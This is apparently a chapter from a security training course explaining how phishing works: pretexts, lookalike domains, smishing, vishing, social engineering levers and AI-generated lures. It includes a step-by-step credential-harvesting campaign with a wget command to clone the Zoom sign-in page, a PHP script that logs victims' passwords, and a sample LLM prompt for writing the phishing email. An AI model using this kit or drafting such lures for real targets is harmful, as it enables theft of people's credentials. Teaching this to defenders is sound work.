Phishing Basics

The Easiest Way In

Every other attack in this module exploits a system. Phishing exploits a person.

You can spend weeks finding a buffer overflow, reverse-engineering a binary, or chaining three vulnerabilities for remote code execution. Or you can send an email that says “your password expires today, click here to reset” and have working credentials in your inbox by morning.

Most modern breaches don’t start with a zero-day. They start with someone clicking a link.

This chapter is about understanding why phishing works, how attackers craft it, and what a real campaign looks like from start to finish.

Broad vs Spear

There are two ends of the phishing spectrum. They trade off the same way every attack does: scale versus precision.

Broad Phishing

A generic email blasted to thousands of inboxes. Low effort, low conversion rate, but the math still works at scale.

• Mimics common services: Microsoft 365, Google Workspace, Dropbox, Netflix
• No personalization beyond the recipient’s name, if that
• One pretext, sent everywhere
• Bets on volume: even a 0.1% click rate from 100,000 emails is 100 victims

This is consumer-grade phishing. Fake invoices, fake delivery notices, fake password reset prompts.

Spear Phishing

A precision email targeted at a specific person or small group. The attacker has done research, often weeks of it.

• Personalized to the target’s role, projects, and relationships
• Mentions real coworkers, real internal tools, real ongoing work
• Crafted to arrive at a plausible moment (during budget season, after a merger, before a deadline)
• Bets on believability: even one successful click can compromise an entire organization

The high end of spear phishing is whaling: targeting executives, board members, or finance directors specifically. The payoff justifies the effort.

Spear phishing is behind nearly every famous corporate breach. The 2014 Sony hack, the 2016 DNC compromise, and the 2020 Twitter incident all started with a single spear phishing email.

Side by Side

The Pretext

A pretext is the fake story behind a phishing message. The reason it makes sense.

A good pretext answers four questions in the victim’s head before they consciously ask them:

1. Who is this from? (a name they recognize, or a role they’d expect)
2. Why are they emailing me? (a plausible business reason)
3. Why now? (timing that fits)
4. What do they want me to do? (a small, reasonable-sounding action)

What Makes It Believable

Three elements, in roughly this order of importance:

• Familiar source: an email from a coworker, vendor, or known service. If the From address looks off, nothing else matters.
• Aligned tone: matches how the supposed sender actually writes (formal, casual, jargon-heavy, terse)
• Plausible ask: something the recipient would expect to be asked, in roughly the way they’d expect to be asked

If any of these break, credibility leaks fast.

Lookalike Domains

When the attacker can’t use a real internal address, the next best thing is a domain that looks like the real one.

Common techniques:

Password managers are the best defense against lookalike domains. They won’t autofill credentials for m1cros0ft.com, even if the page is a pixel-perfect copy of microsoft.com. The domain has to match exactly.

Delivery Channels

Phishing is medium-agnostic. Wherever people communicate, attackers follow.

Email

Still the dominant channel. Cheap to send, easy to spoof, and people read it on autopilot. Most defensive infrastructure is built around email, which means attackers have built the most sophisticated evasion infrastructure around email too.

Smishing (SMS)

Phishing via text message. Effective for several reasons:

• Higher open rates than email (over 90%, often within minutes)
• Smaller screens make URL inspection harder
• Personal medium lowers the recipient’s guard
• URL shorteners are normal in SMS, so suspicious short links don’t stand out

Common pretexts: failed package delivery, bank verification, unexpected MFA prompts the user didn’t trigger.

Vishing (Voice)

A phone call from the attacker, usually impersonating IT support, a bank, or a vendor. Almost pure social engineering, very little technical component.

The classic “CEO gift card scam” is a vishing variant: someone calls or messages an assistant claiming to be an executive, asks them to urgently purchase gift cards for a client meeting, then asks for the codes.

Vishing has become dramatically more effective with voice cloning. We’ll come back to this.

Chat-Based Phishing

Increasingly common, because organizations have shifted to Slack, Microsoft Teams, and Discord for internal communication. These platforms have:

• Weaker spam filtering than email
• Implicit trust between users in the same workspace
• Less user awareness of phishing risk

A phish that lands in a Slack DM from a “new hire” account is often trusted without a second thought.

SIM Swapping

Not phishing by itself, but a key enabler. The attacker convinces a mobile carrier to port the victim’s phone number onto a SIM card the attacker controls.

Once the number is theirs, they receive:

• The victim’s SMS-based MFA codes
• Password reset links sent via SMS
• Phone calls intended for the victim

SMS is the weakest form of MFA. SIM swapping is the main reason. If a target uses SMS-based two-factor authentication, their phone number is a single point of failure.

Social Engineering Levers

A pretext gets the email read. A lever gets the click.

Levers are psychological pressures that push the target into acting before they think carefully.

Trust

The foundation. Every other lever sits on top of it. Trust comes from:

• A recognized sender (real or convincingly spoofed)
• A familiar context (something the recipient expected, or could plausibly expect)
• Surface signals of legitimacy (correct logos, HTTPS, polished language)

Trust is binary in practice. Either the recipient trusts the message and proceeds, or they don’t and the attack ends. Everything else is just trying to push them into the “trust” bucket.

Urgency

Time pressure that prevents careful evaluation:

• “Your password expires in 1 hour.”
• “Verify your account within 24 hours or it will be suspended.”
• “This shared document expires when you close it.”

Urgency works best in environments where employees are already under time pressure. Stressed people skip steps. Calm people read more carefully.

Fear

A threat that triggers a defensive reaction:

• “Suspicious login detected from a new location.”
• “Your account has been compromised.”
• “Legal action will be taken if you don’t respond.”

Fear narrows attention. The victim focuses on resolving the threat and stops evaluating whether the threat is real.

Authority

Pressure from a perceived superior. Hardest to resist in hierarchical organizations:

• A CEO asking for a wire transfer
• A CFO requesting payroll data
• IT demanding immediate credential verification

Authority and urgency combine viciously. “Drop everything, the CFO needs this in 10 minutes” is one of the most effective pretexts in business email compromise.

Baiting

Offering something positive in exchange for action:

• A reward (gift card, bonus, recognition)
• A favor (early access, exclusive invitation)
• An opportunity (job offer, partnership)

Baiting works against the same instincts as scams: the part of the brain that wants the upside often overrides the part checking for downside.

AI-Enhanced Phishing

Phishing used to have obvious tells: bad grammar, awkward phrasing, generic salutations. Those tells are gone.

Modern attackers use Large Language Models to write phishing emails that are indistinguishable from legitimate corporate communication.

LLMs for Pretext Research

Instead of manually digging through LinkedIn, the attacker feeds inputs to an LLM and gets a complete dossier:

• The target’s role and reporting structure
• Internal projects mentioned in public talks or blog posts
• Vendors and tools the company uses
• Writing style of executives, scraped from public posts

This is called Retrieval-Augmented Generation (RAG): the LLM is given access to public information about the target and uses it to ground its output in real facts.

The result is a phishing email that mentions the actual project, the correct internal tool name, and a plausible coworker. Generated in seconds.

Voice Cloning

A few minutes of recorded speech is enough to clone someone’s voice. The training data can come from:

• Conference talks on YouTube
• Podcast appearances
• Earnings calls
• Voicemail greetings

Once cloned, the attacker generates arbitrary speech in that voice. Vishing calls become dramatically more convincing when the boss’s voice is on the line asking for the wire transfer.

Deepfake Video

In 2024, the engineering firm Arup lost $25 million to a deepfake video call. The attacker:

1. Set up a video conference with a finance employee in Hong Kong
2. Joined the call with deepfake clones of the CFO and several other executives
3. Had the “CFO” verbally authorize 15 wire transfers totaling HK$200 million

The victim never spoke to a real person. Every other participant on the call was synthetic.

The tools to do this are freely available now. Voice cloning takes minutes. Video deepfakes take hours. Both will keep getting easier and cheaper.

A Realistic Campaign

To make this concrete, here’s how a credential harvesting campaign actually unfolds end to end.

The starting point: the attacker has a low-privilege foothold in the target organization, usually a set of credentials from a public breach matched against a corporate email address. In this example, the compromised account belongs to [email protected].

Step 1: Internal Reconnaissance

The attacker logs into the helpdesk webmail and reads outgoing messages. They find a recent email sent to the sales department:

“Please log in to Zoom within two weeks to keep your license active.”

Two important findings from this single email:

1. A plausible reason to send another reminder
2. A distinctive writing style to imitate

Step 2: Generate the Phishing Email

The attacker feeds the original email to an LLM with a prompt like:

“Write a follow-up to this email in the same style, reminding employees to log in to Zoom. Include a click-here link.”

The LLM returns a polished email that matches the helpdesk’s tone, vocabulary, and formatting. In seconds.

Step 3: Clone the Sign-In Page

Using wget with flags to mirror the page and rewrite asset links:

wget -E -k -K -p -e robots=off -H -Dzoom.us -nd 
  "https://zoom.us/signin"

What each flag does:

• -E adjusts file extensions to match content types
• -k rewrites links to work locally
• -K keeps original files alongside the rewritten ones
• -p downloads all assets needed to render the page
• -e robots=off ignores robots.txt restrictions
• -H -Dzoom.us allows downloading from zoom.us subdomains
• -nd flattens everything into one directory

The result is a local copy of the sign-in page that looks identical to the real one.

Step 4: Wire the Form to Capture Credentials

The attacker modifies the form’s action attribute to point at a script they control:

<form action="custom_login.php" method="POST">

The script does three things:

1. Writes the submitted email and password to a file
2. Redirects the victim to the real sign-in page
3. Logs nothing visible to the victim

<?php
$data = "Email: " . $_POST['email']
      . "
Password: " . $_POST['password'] . "
";
file_put_contents('credentials.txt', $data, FILE_APPEND);
header('Location: https://zoom.us/signin');
?>

After submitting, the victim ends up on the real sign-in page, sees a normal login screen, assumes they mistyped their password, and logs in again. They never realize anything happened.

Step 5: Send the Email

From the compromised helpdesk@ account, the attacker hits Reply All on the original Zoom license thread and pastes in the LLM-generated text. The malicious link is added as a hyperlink labeled “here” or “log in”.

Because the email comes from the actual helpdesk address, on the actual mail server, with the actual prior conversation in the thread:

• DMARC passes
• SPF passes
• DKIM passes
• The email lands in the inbox, not spam
• The recipient sees a familiar sender continuing a familiar conversation

Step 6: Harvest

Within hours, the credentials file fills up:

Email: [email protected]
Password: W00tw00t!!

Email: [email protected]
Password: Summer2024!

Email: [email protected]
Password: Letmein123!

Every credential is a foothold. The attacker now has working logins for multiple sales accounts and can pivot to anywhere those credentials are reused: VPN, internal Slack, CRM, expense systems.

Why This Works

Looking back at the chain, almost no part of the attack was technical. The technical pieces were:

• One wget command
• A 10-line PHP script
• One modified HTML attribute

Everything else was social: research, pretext, tone matching, trust exploitation, and conversation hijacking.

Phishing is asymmetric. The attacker needs one person to click. The defender needs every person to refuse, every time.

What Defenders Do

Understanding defenses helps you see what’s missing in a target environment.

Every defense closes one door. None of them close every door.